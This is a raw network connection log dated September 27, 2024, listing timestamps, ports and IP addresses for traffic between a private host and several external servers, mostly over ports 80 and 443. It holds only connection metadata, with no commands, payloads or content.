Sep 27, 2024 00:15:14.788428068 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788439989 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788451910 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788464069 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788470984 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.788477898 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788490057 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788501978 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.788502932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788513899 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.788537025 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.788556099 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789226055 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789241076 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789252043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789263964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789269924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789269924 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789283037 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789292097 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789294958 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789314985 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789343119 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789709091 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789720058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789733887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789751053 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789762020 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789771080 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789773941 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789787054 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789787054 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789799929 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789812088 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789815903 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789824009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789835930 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789846897 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789853096 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789860010 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.789872885 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.789886951 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.790169954 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.790209055 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.793992996 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870063066 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870155096 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870166063 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870177031 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870197058 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870208025 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870209932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870225906 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870244026 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870244026 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870256901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870264053 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870270967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870285988 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870296001 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870301962 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870312929 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870341063 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870354891 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870366096 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870378971 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870390892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870403051 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870412111 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870452881 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870496988 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870512962 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870518923 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870524883 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870529890 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870536089 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870543003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870549917 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870637894 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870723009 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870735884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870748997 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870790958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870790958 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870831013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870842934 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870853901 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870865107 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870877028 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870898962 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870920897 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.870981932 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.870995998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871007919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871020079 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871031046 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871042013 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871052980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.871052980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.871052980 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871078968 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.871099949 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.871123075 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871140003 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871159077 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871171951 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871182919 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.871187925 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.871215105 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.873980045 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874026060 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874038935 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874039888 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874044895 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874049902 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874056101 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874078989 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874152899 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874381065 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874393940 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874413967 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874422073 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874475002 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874475002 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874492884 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874505043 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874516964 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874522924 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874533892 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874547005 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874572992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874572992 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874752998 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874763966 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874775887 CEST	80	49774	147.45.44.104	192.168.2.4
Sep 27, 2024 00:15:14.874809980 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.874838114 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:14.911361933 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:14.911439896 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.913265944 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.913271904 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:14.913513899 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:14.914995909 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.914995909 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:14.915060997 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:16.084714890 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:16.084794998 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:16.085499048 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:16.085565090 CEST	80	49778	45.132.206.251	192.168.2.4
Sep 27, 2024 00:15:16.085769892 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:16.085769892 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:16.087814093 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:16.087884903 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:16.087981939 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:16.168924093 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:16.168943882 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:16.168996096 CEST	49777	443	192.168.2.4	188.114.97.3
Sep 27, 2024 00:15:16.169003010 CEST	443	49777	188.114.97.3	192.168.2.4
Sep 27, 2024 00:15:16.224499941 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.224558115 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:16.224729061 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.225749016 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.225761890 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:16.707278013 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:16.707367897 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.709894896 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.709911108 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:16.710210085 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:16.712727070 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.712727070 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:16.712825060 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:18.168853998 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:18.168970108 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:18.169153929 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:18.169732094 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:18.169732094 CEST	49779	443	192.168.2.4	172.67.208.139
Sep 27, 2024 00:15:18.169759035 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:18.169771910 CEST	443	49779	172.67.208.139	192.168.2.4
Sep 27, 2024 00:15:18.197825909 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.197855949 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:18.198005915 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.200861931 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.200875998 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:18.850696087 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:18.850776911 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.854590893 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.854603052 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:18.854935884 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:18.857177973 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:18.903398991 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.418672085 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.418731928 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.418836117 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.418836117 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.418859959 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.418926954 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.521760941 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.521789074 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.521888018 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.521904945 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.521976948 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.521976948 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.527612925 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.527693987 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.527703047 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.527723074 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.527753115 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.527797937 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.532349110 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.532365084 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.532445908 CEST	49780	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:19.532452106 CEST	443	49780	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:19.580601931 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:19.580645084 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:19.580730915 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:19.581285954 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:19.581300974 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.090770006 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.090854883 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.093516111 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.093530893 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.093844891 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.095326900 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.095408916 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.095443010 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.558621883 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.558718920 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.558783054 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.559175968 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.559202909 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:20.559218884 CEST	49781	443	192.168.2.4	172.67.128.144
Sep 27, 2024 00:15:20.559225082 CEST	443	49781	172.67.128.144	192.168.2.4
Sep 27, 2024 00:15:29.447557926 CEST	49764	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:29.448827982 CEST	49778	80	192.168.2.4	45.132.206.251
Sep 27, 2024 00:15:30.642575979 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:30.649034023 CEST	80	49783	104.26.13.205	192.168.2.4
Sep 27, 2024 00:15:30.650477886 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:30.650614977 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:30.657494068 CEST	80	49783	104.26.13.205	192.168.2.4
Sep 27, 2024 00:15:31.230916023 CEST	80	49783	104.26.13.205	192.168.2.4
Sep 27, 2024 00:15:31.240803957 CEST	49784	3389	192.168.2.4	8.46.123.33
Sep 27, 2024 00:15:31.247961998 CEST	3389	49784	8.46.123.33	192.168.2.4
Sep 27, 2024 00:15:31.250370026 CEST	49784	3389	192.168.2.4	8.46.123.33
Sep 27, 2024 00:15:31.254822016 CEST	49784	3389	192.168.2.4	8.46.123.33
Sep 27, 2024 00:15:31.261715889 CEST	3389	49784	8.46.123.33	192.168.2.4
Sep 27, 2024 00:15:31.262299061 CEST	49784	3389	192.168.2.4	8.46.123.33
Sep 27, 2024 00:15:31.383409023 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:34.891604900 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:34.899521112 CEST	80	49783	104.26.13.205	192.168.2.4
Sep 27, 2024 00:15:35.001194000 CEST	80	49783	104.26.13.205	192.168.2.4
Sep 27, 2024 00:15:35.026434898 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.026467085 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.026607037 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.039450884 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.039470911 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.086446047 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:35.509882927 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.510025978 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.512173891 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.512203932 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.512470007 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.633328915 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.681992054 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.723417997 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.779113054 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:35.779886007 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:35.779907942 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:36.217900038 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:36.217987061 CEST	443	49785	188.114.96.3	192.168.2.4
Sep 27, 2024 00:15:36.218064070 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:36.377861977 CEST	49785	443	192.168.2.4	188.114.96.3
Sep 27, 2024 00:15:36.384666920 CEST	49783	80	192.168.2.4	104.26.13.205
Sep 27, 2024 00:15:36.384963989 CEST	49774	80	192.168.2.4	147.45.44.104
Sep 27, 2024 00:15:39.406685114 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:39.406728983 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:39.406831026 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:39.409102917 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:39.409121037 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.054264069 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.054335117 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.100964069 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.100994110 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.101376057 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.101433039 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.102951050 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.147412062 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.573158026 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.573189974 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.573205948 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.573245049 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.573281050 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.573295116 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.573329926 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.735373020 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.735404015 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.735502958 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.735532045 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.735580921 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.742643118 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.742714882 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.742727041 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.742738962 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.742774010 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.742804050 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.743194103 CEST	49786	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:15:40.743210077 CEST	443	49786	104.102.49.254	192.168.2.4
Sep 27, 2024 00:15:40.754158020 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:40.754199028 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:40.754290104 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:40.754553080 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:40.754564047 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:41.429867029 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:41.429970980 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:41.433407068 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:41.433415890 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:41.433669090 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:41.433732033 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:41.434067011 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:41.479396105 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.073081017 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.073216915 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.073230028 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.073266983 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.073282957 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.073307991 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.074490070 CEST	49787	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.074501991 CEST	443	49787	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.077043056 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.077094078 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.077172995 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.077445984 CEST	49788	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:15:42.077460051 CEST	443	49788	5.75.211.162	192.168.2.4
Sep 27, 2024 00:15:42.919558048 CEST	443	49788	5.75.211.162	192.168.2.4
